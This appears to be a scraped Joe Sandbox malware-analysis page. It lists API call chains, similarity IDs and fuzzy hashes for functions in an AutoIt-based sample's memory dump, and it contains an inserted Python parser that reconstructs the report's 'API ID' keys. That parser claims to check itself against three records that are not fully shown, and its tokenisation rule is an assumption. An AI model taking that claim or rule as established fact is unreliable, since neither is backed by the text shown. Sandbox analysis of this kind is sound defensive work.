• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b2ab9efd47f3e3d60fbf73b52aa71b0353794d35c6d929f6e699a060b202f9ac
• Instruction ID: 7cfdcc471efd30d7f791c56cf558852f3ebbe30a50971d61937b92f8cb2e2f16
• Opcode Fuzzy Hash: b2ab9efd47f3e3d60fbf73b52aa71b0353794d35c6d929f6e699a060b202f9ac
• Instruction Fuzzy Hash: FFE0ED36004111FBDB016FA2ED0C925BF39FF4A7227108221F26581970CBB254A0DFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C6EE
• _wcslen.LIBCMT ref: 0013C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0013C7CA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
• Opcode ID: 7174bdc741bf3414403f940fbcffbf4c85951c35d40922b1bc3716cc0c5578e4
• Instruction ID: 14633e3e69c62244943cfd5edae3fe966566f6504e32a771de95cab419ec77b9
• Opcode Fuzzy Hash: 7174bdc741bf3414403f940fbcffbf4c85951c35d40922b1bc3716cc0c5578e4
• Instruction Fuzzy Hash: 03519F726143419BD7149F28CC85BBBB7E8AF49314F040A2DF995F32A1DB70D944CB96
Uniqueness

Uniqueness Score: -1.00%

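Added example, not part of the Joe Sandbox report: a small parser for the function records above that pulls the API calls out of the "APIs" lines and rebuilds the "API ID" similarity key from them. Joe Sandbox does not document how that key is derived; the rule used here (split each API name on CamelCase, drop tokens shorter than three characters and the generic verbs Get/Set/For/Sys, group the rest by how often they occur, most frequent group first, groups joined with "$", tokens sorted inside a group) is an assumption fitted to the three complete records above, whose API lines are embedded as the sample input. The `call_sequence` helper, the stop-word list and the record keys are the example's own.

```python
import re
from collections import Counter

# Constructed sample input: the API lines of three complete function records
# from this report (the GetPixel, UnloadUserProfile and SetMenuItemInfoW
# functions), copied as they appear on the page. Keys are the first ref address.
SAMPLE_RECORDS = {
    "127452": """
• GetClientRect.USER32(?), ref: 00127452
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00127469
• GetWindowDC.USER32(?), ref: 00127475
• GetPixel.GDI32(00000000,?,?), ref: 00127484
• ReleaseDC.USER32(?,00000000), ref: 00127496
• GetSysColor.USER32(00000005), ref: 001274B0
""",
    "13187F": """
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0013187F
• UnloadUserProfile.USERENV(?,?), ref: 0013188B
• CloseHandle.KERNEL32(?), ref: 00131894
• CloseHandle.KERNEL32(?), ref: 0013189C
• GetProcessHeap.KERNEL32(00000000,?), ref: 001318A5
• HeapFree.KERNEL32(00000000), ref: 001318AC
""",
    "13C6EE": """
  • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C6EE
• _wcslen.LIBCMT ref: 0013C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0013C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0013C7CA
""",
}

# One "• Name.MODULE(args), ref: addr" line. CRT calls such as _wcslen have no
# parenthesised argument list, and calls made from a callee carry a prefix.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# CamelCase splitter: "GetWindowDC" -> Get, Window, DC; "_wcslen" -> _wcslen.
TOKEN = re.compile(r"[A-Z][a-z0-9]+|[A-Z]+(?![a-z])|_?[a-z][a-z0-9]*")

# ASSUMPTION: the report does not say which tokens are discarded. Dropping
# tokens shorter than three characters (W, A, DC, Co) plus these generic verbs
# reproduces every complete API ID on this page; other reports may differ.
STOPWORDS = {"Get", "Set", "For", "Sys"}


def parse_api_lines(text):
    """Return [(name, module, [args], ref, is_subcall)] for each API line."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a for a in (m["args"] or "").split(",") if a != ""]
        calls.append((m["name"], m["module"], args, m["ref"].upper(),
                      "Part of subcall" in line))
    return calls


def api_id(api_names):
    """Rebuild the 'API ID' key: tokens grouped by frequency (most frequent
    group first, groups joined with '$'), sorted inside each group."""
    counts = Counter()
    for name in api_names:
        for tok in TOKEN.findall(name):
            if len(tok) < 3 or tok in STOPWORDS:
                continue
            counts[tok] += 1
    by_freq = {}
    for tok, n in counts.items():
        by_freq.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_freq[n]))
                    for n in sorted(by_freq, reverse=True))


def record_api_id(text):
    return api_id(name for name, *_ in parse_api_lines(text))


def call_sequence(text):
    """Direct calls only, in address order, as 'MODULE!Name': the form a
    behaviour or YARA rule would match on."""
    direct = [c for c in parse_api_lines(text) if not c[4]]
    direct.sort(key=lambda c: int(c[3], 16))
    return [f"{mod}!{name}" for name, mod, _, _, _ in direct]


if __name__ == "__main__":
    for start, text in SAMPLE_RECORDS.items():
        print(start, record_api_id(text))
        print("   ", " -> ".join(call_sequence(text)))
```

Running the block prints, for each sample record, the rebuilt key and the direct call chain; the rebuilt keys equal the "API ID" values printed in the three records above, which is the check that the assumed rule is consistent with this report. Comparing keys across samples is only meaningful within one Joe Sandbox version, since the tokenisation is the sandbox's, not a documented standard.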
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00137206
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0013723C
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0013724D
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001372CF
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: f32e26e61f7152bcab2d5a69a55e8eeaae386474c602d0139c90b5753363409f
• Instruction ID: 27ca25eb3b76522bfe997d8c3d17699d160b99592002623a411fed7d735943c2
• Opcode Fuzzy Hash: f32e26e61f7152bcab2d5a69a55e8eeaae386474c602d0139c90b5753363409f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 754141B1604205EFDF25CF94C884AAB7BA9EF45310F1580ADFD059F28AD7B1D945CBA0
                                                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00163E35
• IsMenu.USER32(?), ref: 00163E4A
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00163E92
• DrawMenuBar.USER32 ref: 00163EA5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 84890400522a9e6422343a46106e12e3dfa6f9359387d5d7e91e73eabe1694a9
• Instruction ID: 793b702d386320ecdfbbac711c926f9994ba132d437c54e7845050a2da1f77ec
• Opcode Fuzzy Hash: 84890400522a9e6422343a46106e12e3dfa6f9359387d5d7e91e73eabe1694a9
• Instruction Fuzzy Hash: DB415675A01209AFDB10DF50DC84AEABBF9FF49354F044129E925A7250D735AE61CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00131E66
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00131E79
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00131EA9
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
• Opcode ID: 3188e34b5fc5248ece552ea23087bfba5a3940f5add1d34417c64de29031f761
• Instruction ID: 79d5509d7082f64238c79e9dbd0a3aa5d98e9813840f025b75561e985b647159
• Opcode Fuzzy Hash: 3188e34b5fc5248ece552ea23087bfba5a3940f5add1d34417c64de29031f761
• Instruction Fuzzy Hash: 7B213871A00204BEDB19AB64DC46CFFB7B9DF45360F10412AF826A72E2DB754D4A9630
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00162F8D
• LoadLibraryW.KERNEL32(?), ref: 00162F94
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00162FA9
• DestroyWindow.USER32(?), ref: 00162FB1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: fa8aa46a7bfe6aa7c6d12ed96c709e87e425cfec054bc00278e05703093d5b7a
• Instruction ID: 333e447809d86b0433978fb1780aa9ae69eaea04670dae3cbdc326dce7ad221b
• Opcode Fuzzy Hash: fa8aa46a7bfe6aa7c6d12ed96c709e87e425cfec054bc00278e05703093d5b7a
• Instruction Fuzzy Hash: F1218C72204605ABEB104FA4DC80EBB77B9EF59364F104659FA50D61A0D7B1DCA197A0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000F4D1E,001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002), ref: 000F4D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F4DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,000F4D1E,001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000), ref: 000F4DC3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 415e4422af9170a5db208e9dcd0570c9ca9000ac67d0f80aff76b5b1aa38a43f
• Instruction ID: ce1fc2d8e264d2c9e93cbe97df19076e48cc17218ae8f0b3aace45e938d53275
• Opcode Fuzzy Hash: 415e4422af9170a5db208e9dcd0570c9ca9000ac67d0f80aff76b5b1aa38a43f
• Instruction Fuzzy Hash: 48F08C34A00208EBDB159B94DC49BFEBBF8EB44712F0040A9F949A2A60CB705980DAD0
Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D4EAE
• FreeLibrary.KERNEL32(00000000,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EC0
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: 877d8353bf84fe244f32dc4942e93d530f2934349c99cbb30ab1d074a3a5c141
• Instruction ID: 249b5725119f3131d421f6614263c16b339a444c9b20eef6c64da510b8b0385c
• Opcode Fuzzy Hash: 877d8353bf84fe244f32dc4942e93d530f2934349c99cbb30ab1d074a3a5c141
• Instruction Fuzzy Hash: 29E0CD35A01722ABD27117256C18B7F67D4AF82FA27090116FC40D2300DFB0CD4144F0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D4E74
• FreeLibrary.KERNEL32(00000000,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E87
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: 0e2cc8adb7033a2c1eba9194de869f7962aeec76a8f108b91aefd1e3e7c46662
• Instruction ID: a9e0906e4817294dbd2f1a180c0891b59226a716cd775e621150f0fc5402eafb
• Opcode Fuzzy Hash: 0e2cc8adb7033a2c1eba9194de869f7962aeec76a8f108b91aefd1e3e7c46662
• Instruction Fuzzy Hash: E6D01235502761A79A621B25AC18DEB6B58AFC6B513050616F945A2214CFB0CD4185E0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142C05
• DeleteFileW.KERNEL32(?), ref: 00142C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00142C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00142CC0
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: e1a7fbea31f31cba4360c72d776c5c13d50c53ad4f4e390c043ef224dc561f30
• Instruction ID: bfbe17da7c65d1b3856332d95104b69c849336de247f82b3949cbb076a6fa56a
• Opcode Fuzzy Hash: e1a7fbea31f31cba4360c72d776c5c13d50c53ad4f4e390c043ef224dc561f30
• Instruction Fuzzy Hash: 56B13E7190011DABDF25DBA4CC85EEEBB7DEF48350F5040A6FA09E7152EB309A848F61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 0015A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0015A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0015A468
• CloseHandle.KERNEL32(?), ref: 0015A63D
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 481c5cd9331a4da692d1a02c7952d12c66770f1b30d0a3dfa7ff783917e19c75
• Instruction ID: 1898507f1a3255609f7572c959355a792e4794a64597d567c3c55f2d35a2e695
• Opcode Fuzzy Hash: 481c5cd9331a4da692d1a02c7952d12c66770f1b30d0a3dfa7ff783917e19c75
• Instruction Fuzzy Hash: 76A190B16043019FD720DF24C882F6AB7E1AF84714F54891DF9AA9B392D7B0EC45CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00173700), ref: 0010BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,001A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0010BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,001A1270,000000FF,?,0000003F,00000000,?), ref: 0010BC36
• _free.LIBCMT ref: 0010BB7F
  • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
  • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
• _free.LIBCMT ref: 0010BD4B
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1286116820-0
                                                                                                                                                                                                                                          • Opcode ID: 3cbeb253b9012ee4d5a26c283c73266968ea81ac30559494ea5fd7d9af63e964
                                                                                                                                                                                                                                          • Instruction ID: cfb5c5a262975ee616a21850df9ef6877224c2a12335a0f368746f1545dfebc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cbeb253b9012ee4d5a26c283c73266968ea81ac30559494ea5fd7d9af63e964
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9510875908209AFDB14EF659DC1AAEB7B8FF51350F20426AE494D71D1EBB09E808B90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0013CF22,?), ref: 0013DDFD
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0013CF22,?), ref: 0013DE16
                                                                                                                                                                                                                                            • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0013E473
                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0013E4AC
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E5EB
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013E603
                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0013E650
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3183298772-0
                                                                                                                                                                                                                                          • Opcode ID: 3395313833248da642bbfc27b8141c6f27d1917bca10a005418e5641d33fdb2f
                                                                                                                                                                                                                                          • Instruction ID: ff512a8058b0e95c1e62ae2fde4dfdf4ffbbad91629ce5a12bd9dbb189d099a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3395313833248da642bbfc27b8141c6f27d1917bca10a005418e5641d33fdb2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 875174B25083459BC724EB90DC81DEFB7ECAF95340F00491EF689D3192EF75A6888766
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BAA5
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BB00
                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0015BB63
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0015BBA6
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015BBB3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
